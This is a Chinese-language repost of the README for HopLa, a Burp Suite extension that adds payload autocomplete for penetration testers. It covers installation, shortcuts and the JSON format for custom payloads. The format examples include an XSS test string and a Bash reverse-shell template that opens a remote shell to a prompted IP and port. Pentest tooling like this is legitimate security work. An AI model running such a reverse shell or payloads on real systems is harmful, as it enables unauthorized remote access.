目录导航
HopLa Burp Suite Extender插件-在Burp Suite中添加自动补全支持和有用的有效负载.
PayloadsAllTheThings的所有功能,而无需额外输入。此扩展在Burp Suite中添加了自动补全支持和有用的有效负载,使入侵变得更容易。
随时改善您的有效载荷!
入门
安装
- 从发布目录下载jar文件
- 使用“扩展器”选项卡将其添加到Burp Suite
建造
执行gradle build
,您将在中准备好插件releases/HopLa.jar
。
用法
默认情况下,HopLa随附了默认的有效负载。您可以通过在菜单中加载自定义JSON文件来添加自己的文件。
HopLa首次使用时会创建一个JSON文件,其中包含jar文件目录中的所有有效负载。
按下Ctrl+Q
以显示有效载荷库菜单。
您可以在顶部菜单中禁用全局自动补全功能。
对于i3,将以下行添加到$HOME/.config/i3/config
浮动框架中:
for_window [class=".*burp-StartBurp.*" title="^ $"] floating enable
如何添加有效载荷
JSON有效负载文件遵循以下结构:
{ "categories": [ { "name": "XSS", "values": [ { "name": "Simple", "value": "alert(1) " }, { "name": "Multiline", "value": "AAAA\nBBBB" }, { "name" : "Nested XSS menu", "values": [ { "name": "Simple 2", "value": "alert(1) " } ] } ] } ], "keywords": [ { "name": "Headers", "values": [ "X-Forwarded-For", "X-Originally-Forwarded-For", "X-Originating-Ip", "X-Originating-IP" ] } ] }
没有嵌套限制。
您可以自动添加一个提示对话框:
{ "name": "Bash UDP", "value": "sh -i >& /dev/udp/§IP§/§PORT§ 0>&1", "prompt": ["IP","PORT"] },
要仅添加菜单中未显示的关键字,可以将其添加到关键字类别中:
{
"keywords": [
{
"name": "Headers",
"values": [
"X-Forwarded-For",
"X-Originally-Forwarded-For",
"X-Originating-Ip",
"X-Originating-IP"
]
}
]
}
HopLa插件下载地址
①GitHub: HopLa.jar
②迅雷网盘: https://pan.xunlei.com/ 提取码: db43
解压密码: www.ddosi.org
HopLa插件截图
快捷键ctrl Q
XSS payloads
文件读取
自定义payloads
如需修改payloads,到插件所在目录下的config.json文件里修改
自带的payloads比较少,建议替换成自己的.
路线图
- 支持有效载荷菜单的自定义键绑定
谢谢
- https://github.com/Static-Flow/BurpSuiteAutoCompletion
- https://github.com/d3vilbug/HackBar
- https://github.com/swisskyrepo/PayloadsAllTheThings
非常感谢您的出色工作!